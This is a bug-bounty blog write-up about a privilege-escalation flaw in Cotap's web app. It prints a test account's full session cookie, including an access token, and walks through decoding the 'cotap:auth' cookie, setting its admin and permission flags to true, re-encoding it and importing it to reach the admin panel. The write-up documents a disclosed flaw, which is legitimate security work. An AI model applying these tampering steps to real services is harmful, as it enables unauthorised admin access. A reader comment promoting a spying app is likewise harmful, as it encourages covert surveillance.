Buy Royal UI Officially! Contact Us Buy Now!
Home
BROWSER
BUGBOUNTY

Cotap Admin Panel Takeover

Dipak Kumar Das
Once I was invited to a Hackerone private program . So here is one Bug i have found in cotap

So lets start
When ever i got any new target i do a quick subdomain enumeration so for subdomain scaning you can use
some great tools like knock or This online tool 

so after a subdomain scan i got a subdomain admin.cotap.com
then i visited admin.cotap.com then it redirected me to app.cotap.com which is an normal user interface , so here no problem its ok

so now though how to get into the admin panel , Tried a lot but failed

so after few days i was testing it again and that time i am testing as normal user then i export the cookie and i found this
Here is the active user session cookie
[
{
"domain": ".cotap.com",
"expirationDate": 1504556226,
"hostOnly": false,
"httpOnly": false,
"name": "ga",
"path": "/",
"secure": false,
"session": false,
"storeId": "0",
"value": "GA1.2.1098904338.1441483504",
"id": 1
},
{
"domain": ".cotap.com",
"expirationDate": 1473020194,
"hostOnly": false,
"httpOnly": false,
"name": "ajs_anonymous_id",
"path": "/",
"secure": false,
"session": false,
"storeId": "0",
"value": "%227641cefa-af44-46b3-90e5-6b7df324bc86%22",
"id": 2
},
{
"domain": ".cotap.com",
"expirationDate": 1473020144,
"hostOnly": false,
"httpOnly": false,
"name": "ajs_group_id",
"path": "/",
"secure": false,
"session": false,
"storeId": "0",
"value": "null",
"id": 3
},
{
"domain": ".cotap.com",
"expirationDate": 1473020194,
"hostOnly": false,
"httpOnly": false,
"name": "ajs_user_id",
"path": "/",
"secure": false,
"session": false,
"storeId": "0",
"value": "%22test%40armyspy.com%22",
"id": 4
},
{
"domain": ".cotap.com",
"expirationDate": 1756844163,
"hostOnly": false,
"httpOnly": false,
"name": "amplitude_idcotap.com",
"path": "/",
"secure": false,
"session": false,
"storeId": "0",
"value": "eyJkZXZpY2VJZCI6IjA4MWUwNjg0LTlmZWUtNDBmOC04OWZiLWVkZjFkMTI5NjJlZCIsInVzZXJJZCI6bnVsbCwib3B0T3V0IjpmYWxzZX0=",
"id": 5
},
{
"domain": ".cotap.com",
"expirationDate": 2072204226,
"hostOnly": false,
"httpOnly": false,
"name": "cotap:auth",
"path": "/",
"secure": true,
"session": false,
"storeId": "0",
"value": "JTdCJTIydGFsa2VyJTIyJTNBJTdCJTIyaWQlMjIlM0E0ODAzMzM5MiUyQyUyMmFkZHJlc3MlMjIlM0ElMjJ0ZXN0JTQwYXJteXNweS5jb20lMjIlMkMlMjJwZXJzb25hbF9hZGRyZXNzJTIyJTNBdHJ1ZSUyQyUyMnZlcmlmaWVkJTIyJTNBdHJ1ZSUyQyUyMmZpcnN0X25hbWUlMjIlM0ElMjJoZWxsbyUyMiUyQyUyMmxhc3RfbmFtZSUyMiUzQSUyMm1lJTIyJTJDJTIyYXZhdGFyX3VybCUyMiUzQW51bGwlMkMlMjJub3RpZmljYXRpb25fbWV0aG9kJTIyJTNBJTIyZW1haWwlMjIlMkMlMjJ1c2VybmFtZSUyMiUzQW51bGwlMkMlMjJ0aW1lc3RhbXAlMjIlM0ElMjIyMDE1LTA5LTA1VDAzJTNBNTMlM0EzMC4yMzVaJTIyJTJDJTIycmVnaXN0ZXJlZCUyMiUzQXRydWUlMkMlMjJwcmVtaXVtJTIyJTNBZmFsc2UlMkMlMjJhZG1pbiUyMiUzQWZhbHNlJTJDJTIycGVybWlzc2lvbnMlMjIlM0ElN0IlMjJkaXNhYmxlX2NvbnZlcnNhdGlvbl9zaGFyaW5nJTIyJTNBZmFsc2UlMkMlMjJyZW1vdmVfcGFydGljaXBhbnRzJTIyJTNBZmFsc2UlMkMlMjJmaWxlcyUyMiUzQXRydWUlMkMlMjJwcmVtaXVtX2ZpbGVzJTIyJTNBZmFsc2UlMkMlMjJyYXRpbmdfcmVtaW5kZXIlMjIlM0FmYWxzZSUyQyUyMnBsYWNlX3ZpZGVvX2NhbGxzJTIyJTNBZmFsc2UlN0QlMkMlMjJwaG9uZV9udW1iZXIlMjIlM0FudWxsJTdEJTJDJTIyYWRkcmVzcyUyMiUzQSUyMnRlc3QlNDBhcm15c3B5LmNvbSUyMiUyQyUyMnNjb3BlJTIyJTNBJTIyd2ViJTIyJTJDJTIyc3VwcG9ydGVkX3NjaGVtZXMlMjIlM0ElNUIlMjJjb2RlX21vZGUlMjIlNUQlMkMlMjJhY2Nlc3NfdG9rZW4lMjIlM0ElMjI4MzEyNmNjZTE2MzYwNDY3Y2M5YjJlNjI3ZThhYWRmMyUyMiUyQyUyMnN0YXRlJTIyJTNBJTIydmVyaWZpZWQlMjIlMkMlMjJzY2hlbWUlMjIlM0ElN0IlMjJ0eXBlJTIyJTNBJTIyY29kZV9tb2RlJTIyJTJDJTIyY29uZmlybV9hZGRyZXNzJTIyJTNBZmFsc2UlMkMlMjJyZXF1aXJlX3Byb2ZpbGUlMjIlM0FmYWxzZSU3RCUyQyUyMmNvZGUlMjIlM0ElMjIzMjI2JTIyJTJDJTIycHVibnViX2NoYW5uZWwlMjIlM0ElMjJlOTI2NTc0YzBmMDdlMzhhNWIwNGMzZjIxOGE4YTk4YzYzODAwNGEwNzA2NzYzOTc3MGVkNGMzYTk0ZTI5YzFlYzdkZjExZTgxNjJiNzVjMzNlZDg1OTdmYWQ2ZGEyNmUwYjExNDNlZDFhOWQxZTgzNjRiY2U3Nzg2OTJkN2Y0NyUyMiU3RA==",
"id": 6
},
{
"domain": "app.cotap.com",
"expirationDate": 1473020194,
"hostOnly": true,
"httpOnly": false,
"name": "mp7a46f06059cd77ff0cf1576eedb16eb3_mixpanel",
"path": "/",
"secure": false,
"session": false,
"storeId": "0",
"value": "%7B%22distinct_id%22%3A%20%22test%40armyspy.com%22%2C%22%24initial_referrer%22%3A%20%22%24direct%22%2C%22%24initial_referring_domain%22%3A%20%22%24direct%22%2C%22mp_name_tag%22%3A%20%22test%40armyspy.com%22%2C%22id%22%3A%20%22test%40armyspy.com%22%2C%22%24email%22%3A%20%22test%40armyspy.com%22%7D",
"id": 7
},
{
"domain": "app.cotap.com",
"expirationDate": 1911844800,
"hostOnly": true,
"httpOnly": false,
"name": "pnctest",
"path": "/",
"secure": false,
"session": false,
"storeId": "0",
"value": "1",
"id": 8
}
]

the cookie name " cotap:auth "  contains this

JTdCJTIydGFsa2VyJTIyJTNBJTdCJTIyaWQlMjIlM0E0ODAzMzM5MiUyQyUyMmFkZHJlc3MlMjIlM0ElMjJ0ZXN0JTQwYXJteXNweS5jb20lMjIlMkMlMjJwZXJzb25hbF9hZGRyZXNzJTIyJTNBdHJ1ZSUyQyUyMnZlcmlmaWVkJTIyJTNBdHJ1ZSUyQyUyMmZpcnN0X25hbWUlMjIlM0ElMjJoZWxsbyUyMiUyQyUyMmxhc3RfbmFtZSUyMiUzQSUyMm1lJTIyJTJDJTIyYXZhdGFyX3VybCUyMiUzQW51bGwlMkMlMjJub3RpZmljYXRpb25fbWV0aG9kJTIyJTNBJTIyZW1haWwlMjIlMkMlMjJ1c2VybmFtZSUyMiUzQW51bGwlMkMlMjJ0aW1lc3RhbXAlMjIlM0ElMjIyMDE1LTA5LTA1VDAzJTNBNTMlM0EzMC4yMzVaJTIyJTJDJTIycmVnaXN0ZXJlZCUyMiUzQXRydWUlMkMlMjJwcmVtaXVtJTIyJTNBZmFsc2UlMkMlMjJhZG1pbiUyMiUzQWZhbHNlJTJDJTIycGVybWlzc2lvbnMlMjIlM0ElN0IlMjJkaXNhYmxlX2NvbnZlcnNhdGlvbl9zaGFyaW5nJTIyJTNBZmFsc2UlMkMlMjJyZW1vdmVfcGFydGljaXBhbnRzJTIyJTNBZmFsc2UlMkMlMjJmaWxlcyUyMiUzQXRydWUlMkMlMjJwcmVtaXVtX2ZpbGVzJTIyJTNBZmFsc2UlMkMlMjJyYXRpbmdfcmVtaW5kZXIlMjIlM0FmYWxzZSUyQyUyMnBsYWNlX3ZpZGVvX2NhbGxzJTIyJTNBZmFsc2UlN0QlMkMlMjJwaG9uZV9udW1iZXIlMjIlM0FudWxsJTdEJTJDJTIyYWRkcmVzcyUyMiUzQSUyMnRlc3QlNDBhcm15c3B5LmNvbSUyMiUyQyUyMnNjb3BlJTIyJTNBJTIyd2ViJTIyJTJDJTIyc3VwcG9ydGVkX3NjaGVtZXMlMjIlM0ElNUIlMjJjb2RlX21vZGUlMjIlNUQlMkMlMjJhY2Nlc3NfdG9rZW4lMjIlM0ElMjI4MzEyNmNjZTE2MzYwNDY3Y2M5YjJlNjI3ZThhYWRmMyUyMiUyQyUyMnN0YXRlJTIyJTNBJTIydmVyaWZpZWQlMjIlMkMlMjJzY2hlbWUlMjIlM0ElN0IlMjJ0eXBlJTIyJTNBJTIyY29kZV9tb2RlJTIyJTJDJTIyY29uZmlybV9hZGRyZXNzJTIyJTNBZmFsc2UlMkMlMjJyZXF1aXJlX3Byb2ZpbGUlMjIlM0FmYWxzZSU3RCUyQyUyMmNvZGUlMjIlM0ElMjIzMjI2JTIyJTJDJTIycHVibnViX2NoYW5uZWwlMjIlM0ElMjJlOTI2NTc0YzBmMDdlMzhhNWIwNGMzZjIxOGE4YTk4YzYzODAwNGEwNzA2NzYzOTc3MGVkNGMzYTk0ZTI5YzFlYzdkZjExZTgxNjJiNzVjMzNlZDg1OTdmYWQ2ZGEyNmUwYjExNDNlZDFhOWQxZTgzNjRiY2U3Nzg2OTJkN2Y0NyUyMiU3RA==

So here you can guess its a Base64

so what i did here

Step 1: Make a Base64 Decode

%7B%22talker%22%3A%7B%22id%22%3A48033392%2C%22address%22%3A%22test%40armyspy.com%22%2C%22personal_address%22%3Atrue%2C%22verified%22%3Atrue%2C%22first_name%22%3A%22hello%22%2C%22last_name%22%3A%22me%22%2C%22avatar_url%22%3Anull%2C%22notification_method%22%3A%22email%22%2C%22username%22%3Anull%2C%22timestamp%22%3A%222015-09-05T03%3A53%3A30.235Z%22%2C%22registered%22%3Atrue%2C%22premium%22%3Afalse%2C%22admin%22%3Afalse%2C%22permissions%22%3A%7B%22disable_conversation_sharing%22%3Afalse%2C%22remove_participants%22%3Afalse%2C%22files%22%3Atrue%2C%22premium_files%22%3Afalse%2C%22rating_reminder%22%3Afalse%2C%22place_video_calls%22%3Afalse%7D%2C%22phone_number%22%3Anull%7D%2C%22address%22%3A%22test%40armyspy.com%22%2C%22scope%22%3A%22web%22%2C%22supported_schemes%22%3A%5B%22code_mode%22%5D%2C%22access_token%22%3A%2283126cce16360467cc9b2e627e8aadf3%22%2C%22state%22%3A%22verified%22%2C%22scheme%22%3A%7B%22type%22%3A%22code_mode%22%2C%22confirm_address%22%3Afalse%2C%22require_profile%22%3Afalse%7D%2C%22code%22%3A%223226%22%2C%22pubnub_channel%22%3A%22e926574c0f07e38a5b04c3f218a8a98c638004a07067639770ed4c3a94e29c1ec7df11e8162b75c33ed8597fad6da26e0b1143ed1a9d1e8364bce778692d7f47%22%7D
Step 2: Make a Url decode

{"talker":{"id":48033392,"address":"test@armyspy.com","personal_address":true,"verified":true,"first_name":"hello","last_name":"me","avatar_url":null,"notification_method":"email","username":null,"timestamp":"2015-09-05T03:53:30.235Z","registered":true,"premium":false,"admin":false,"permissions":{"disable_conversation_sharing":false,"remove_participants":false,"files":true,"premium_files":false,"rating_reminder":false,"place_video_calls":false},"phone_number":null},"address":"test@armyspy.com","scope":"web","supported_schemes":["code_mode"],"access_token":"83126cce16360467cc9b2e627e8aadf3","state":"verified","scheme":{"type":"code_mode","confirm_address":false,"require_profile":false},"code":"3226","pubnub_channel":"e926574c0f07e38a5b04c3f218a8a98c638004a07067639770ed4c3a94e29c1ec7df11e8162b75c33ed8597fad6da26e0b1143ed1a9d1e8364bce778692d7f47"}
Step 3: change all value false to true
premium":false,"admin":false,"permissions":{"disable_conversation_sharing":false,"remove_participants":false,"files":true,"premium_files":false,"rating_reminder":false,"place_video_calls":false}
(in those parameters change false to true )

Step 4: Now after changing false to true make a url encode and then a Base64 encode and replace the old value of cotap:auth with new value and then import the cookie to normal user interface app.cotap.com and visited admin.cotap.com

And Finally i logged in as admin






Poc Images:



Thanks

Suggestion and Feedback are welcome

  




Previous
Next

#BROWSER #BUGBOUNTY #COOKIE STEALING

6 comments

  1. Nice one..
    1. Thq bro :)
  2. Nice finding..How many reward you got with this bug.
    1. sorry Its private
  3. nice catch (y)
  4. Take a look at thetruthspy to understand how great to spy on somebody.
Post a Comment
  • A-
  • A+

© ADDICTIVE HACKERS. All rights reserved.

Cookie Consent
We serve cookies on this site to analyze traffic, remember your preferences, and optimize your experience.
More Details
Oops!
It seems there is something wrong with your internet connection. Please connect to the internet and start browsing again.
AdBlock Detected!
We have detected that you are using adblocking plugin in your browser.
The revenue we earn by the advertisements is used to manage this website, we request you to whitelist our website in your adblocking plugin.
Site is Blocked
Sorry! This site is not available in your country.